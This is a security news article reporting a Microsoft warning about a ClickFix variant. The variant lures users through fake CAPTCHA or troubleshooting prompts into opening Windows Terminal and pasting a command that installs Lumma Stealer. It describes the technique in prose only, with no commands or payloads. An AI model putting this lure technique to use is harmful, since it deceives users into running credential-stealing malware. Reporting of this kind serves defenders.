New ClickFix Variant Abuses Windows Terminal to Bypass Run Dialog Protections and Deploy Lumma Stealer

Microsoft warns of a new ClickFix variant using Windows Terminal (wt.exe) to bypass Run dialog protections and infect systems with Lumma Stealer.

By: AXL Media

Published: Mar 10, 2026, 7:16 AM EDT

Source: The information in this article was sourced from SecurityWeek

Evolution of Social Engineering: Beyond the Run Dialog

Microsoft has issued a warning regarding a new variant of the "ClickFix" attack that demonstrates a tactical shift in how malicious payloads are delivered to Windows users. Historically, ClickFix campaigns relied on tricking users into using the Win + R (Run) dialog to paste and execute malicious PowerShell commands disguised as "troubleshooting" fixes or CAPTCHA verifications. However, the new campaign, first detected in February 2026, instructs victims to use the Windows + X → I shortcut. This specific sequence launches the Windows Terminal (wt.exe) directly, bypassing existing security heuristics that specifically monitor the Run dialog for suspicious activity.

Mimicking Administrative Workflows to Build Trust

The primary innovation of this variant is its use of a "privileged command execution environment" to appear more trustworthy. By guiding users into the Windows Terminal—a tool frequently used by IT professionals and power users—the attack blends into legitimate administrative workflows. Victims are presented with fake CAPTCHA pages or troubleshooting prompts that look like official system messages. Once the user pastes the malicious command into the terminal, they are effectively granting the attacker a high level of access, as the terminal environment often carries more inherent authority in the mind of the user than a simple Run prompt.

Technical Execution and the Lumma Stealer Payload

The execution of the malicious command triggers a complex, multi-stage attack chain. Once the command is entered into the Windows Terminal, it spawns a PowerShell process that decodes embedded hexadecimal commands. This leads to the installation of Lumma Stealer, a notorious piece of malware designed to exfiltrate browser data, login credentials, and other sensitive information. To ensure longevity, the malware achieves persistence through scheduled tasks and employs sophisticated anti-malware evasion routines. This variant highlights the effectiveness of using built-in Windows tools (Living-off-the-Land) to hide malicious activity from traditional endpoint detection.